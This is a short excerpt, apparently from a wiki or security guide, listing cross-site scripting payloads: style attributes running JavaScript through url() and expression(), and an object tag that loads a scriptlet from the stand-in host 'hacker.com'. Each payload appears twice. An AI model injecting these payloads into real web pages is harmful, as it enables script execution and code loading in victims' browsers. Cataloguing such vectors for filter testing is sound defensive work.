...
No Format |
---|
<div style="background-image: url(javascript:alert('XSS'))"> <div style="width: expression(alert('XSS'));"> |
- Usage of object with include:
No Format |
---|
<object type="text/x-scriptlet" data="http://hacker.com/xss.html"> |
...
...
No Format |
---|
<div style="background-image: url(javascript:alert('XSS'))"> <div style="width: expression(alert('XSS'));"> |
No Format |
---|
<object type="text/x-scriptlet" data="http://hacker.com/xss.html"> |
...